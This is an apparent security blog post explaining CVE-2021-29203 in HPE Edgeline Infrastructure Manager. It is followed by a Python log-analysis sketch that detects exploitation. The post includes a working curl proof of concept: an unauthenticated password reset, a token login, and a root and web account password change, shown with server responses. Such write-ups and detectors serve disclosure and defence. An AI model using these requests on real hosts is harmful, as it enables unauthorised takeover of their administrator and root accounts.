
CVE-2021-29203 (HP Edgeline Manager) - Explained


CVE-2021-29203 is an interesting vulnerability that lets an attacker take advantage of a security feature within HPE Edgeline Infrastructure Management software in any version prior to 1.22. When the software is set up for the first time, the administrator is prompted to reset the default password. This is done by using the following URL:



However, this URL remains valid even after the password is reset. An unauthenticated attacker can then use the same URL to change the password of the OS root account, which allows the attacker to log in to the host via SSH. Let's take a look at a proof of concept.


First we reset the Administrator password.


curl -k --tlsv1.2 -H 'Content-Type: application/json' -d '{"Password":"Cygenta"}' -X PATCH https://x.x.x.x/redfish/v1/SessionService/ResetPassword/1

{"Messages": [{"MessageID": "Base.1.0.Updated"}], "@odata.type": "#Message.1.0.0.Message", "error": {"@Message.ExtendedInfo": [{"MessageID": "Base.1.0.updated"}], "code": "iLO.1.0.ExtendedInfo"}}

Next we log in with the new password and get our X-Auth-Token.



curl -ki --tlsv1.2 -H 'content-type: application/json' -d '{"UserName":"Administrator","Password":"Cygenta"}' https://x.x.x.x/redfish/v1/SessionService/Sessions

HTTP/1.1 201 Created
Server: nginx
Date: Thu, 13 May 2021 23:17:04 GMT
Content-Type: application/json
Content-Length: 195
Connection: keep-alive
X-Auth-Token: efb3xxxxxxxxxxxx7f2b
Is-Ldap: False
PasswordReset: False
Location: https://x.x.x.x/redfish/v1/SessionService/Sessions/Administrator16
Cache-Control: no-cache
OData-Version: 4.0
Link: https://x.x.x.x/redfish/v1/SchemaStore/en/SessionCollection.json;rel=describedby
Vary: Accept
Allow: POST, OPTIONS, GET
X-Frame-Options: SAMEORIGIN
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

{"Messages": [{"MessageID": "Base.1.0.Created"}], "@odata.type": "#Message.1.0.0.Message", "error": {"@Message.ExtendedInfo": [{"MessageID": "Base.1.0.Created"}], "code": "iLO.1.0.ExtendedInfo"}}

Now we can reset both the OS root account and the web application account passwords.


curl -ki --tlsv1.2  -H 'content-type: application/json' -H 'x-auth-token: efb3xxxxxxxxxxxx7f2b' -d '{"Password":"Cygenta"}' -X PATCH https://x.x.x.x/redfish/v1/AccountService/Accounts/1

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 23:25:18 GMT
Content-Type: application/json
Content-Length: 75
Connection: keep-alive
Vary: Accept, Cookie
Allow: POST, GET, DELETE, OPTIONS, PATCH
X-Frame-Options: SAMEORIGIN
Set-Cookie: sessionid=3xrhw4xxxxxxxxxxxxxxxxxxxx; expires=Thu, 21 April 2021 23:25:18 GMT; HttpOnly; Max-Age=1209600; Path=/; SameSite=Lax
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

{"Status": "success", "Invalid_Entries": [], "Valid_Entries": ["Password"]}

This simple authentication bypass was discovered by the team at Tenable, and more information can be found on the NIST website.


HP has already released a software patch for this vulnerability and recommends applying it as soon as possible. For more information and to download the patch, visit HP.
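
The three requests in the proof of concept leave a recognisable trace in the web server's access log, which is useful for checking hosts that were exposed before patching. The following detection sketch is an added example, not part of the original post or HPE's tooling; it assumes nginx's "combined" log format (the responses above show `Server: nginx`), and the sample log lines are constructed.

```python
import re
from collections import defaultdict
# Assumption: nginx "combined" access-log format; the appliance's own format may differ.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Redfish paths as they appear in the requests shown in the post.
RULES = [
    ("reset", "PATCH", re.compile(r"^/redfish/v1/SessionService/ResetPassword/\d+/?$")),
    ("login", "POST", re.compile(r"^/redfish/v1/SessionService/Sessions/?$")),
    ("account", "PATCH", re.compile(r"^/redfish/v1/AccountService/Accounts/\d+/?$")),
]

def classify(method, path):
    path = path.split("?", 1)[0]  # ignore any query string
    for kind, verb, pattern in RULES:
        if method == verb and pattern.match(path):
            return kind
    return None

def find_alerts(lines):
    """Return (client_ip, timestamp, severity, reason) tuples in log order."""
    # stage per client: 0 = nothing seen, 1 = reset accepted, 2 = reset then login
    stage, alerts = defaultdict(int), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, ts, ok = m["ip"], m["ts"], m["status"].startswith("2")
        kind = classify(m["method"], m["path"])
        if kind == "reset" and ok:
            # Once first-time setup is done, nothing should call this endpoint.
            stage[ip] = 1
            alerts.append((ip, ts, "high", "ResetPassword request accepted"))
        elif kind == "reset":
            alerts.append((ip, ts, "low", "ResetPassword request rejected"))
        elif kind == "login" and ok and stage[ip] >= 1:
            stage[ip] = 2
        elif kind == "account" and ok and stage[ip] == 2:
            alerts.append((ip, ts, "critical", "reset, login, then account password change"))
    return alerts

# Constructed sample lines (documentation addresses, invented user agents), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [13/May/2021:23:16:40 +0000] "PATCH /redfish/v1/SessionService/ResetPassword/1 HTTP/1.1" 200 195 "-" "curl/7.68.0"',
    '198.51.100.7 - - [13/May/2021:23:17:04 +0000] "POST /redfish/v1/SessionService/Sessions HTTP/1.1" 201 195 "-" "curl/7.68.0"',
    '192.0.2.10 - - [13/May/2021:23:20:00 +0000] "PATCH /redfish/v1/AccountService/Accounts/1 HTTP/1.1" 200 75 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/May/2021:23:25:18 +0000] "PATCH /redfish/v1/AccountService/Accounts/1 HTTP/1.1" 200 75 "-" "curl/7.68.0"',
    '203.0.113.5 - - [14/May/2021:01:00:00 +0000] "PATCH /redfish/v1/SessionService/ResetPassword/1 HTTP/1.1" 403 0 "-" "-"',
]
if __name__ == "__main__":
    print(*find_alerts(SAMPLE), sep="\n")
```

The account change from 192.0.2.10 is not flagged because that client never touched the reset endpoint, which keeps ordinary administrator activity out of the results.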

